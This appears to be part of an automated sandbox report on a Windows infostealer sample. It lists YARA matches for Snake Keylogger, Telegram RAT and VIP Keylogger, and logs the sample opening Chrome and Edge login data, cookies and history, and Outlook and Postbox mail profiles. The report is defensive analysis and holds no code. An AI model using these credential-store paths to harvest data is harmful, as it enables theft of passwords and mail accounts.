Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028A8BB0 GetLocalTime,

0_2_028A8BB0

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028AB0B0 GetVersionExA,

0_2_028AB0B0

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE
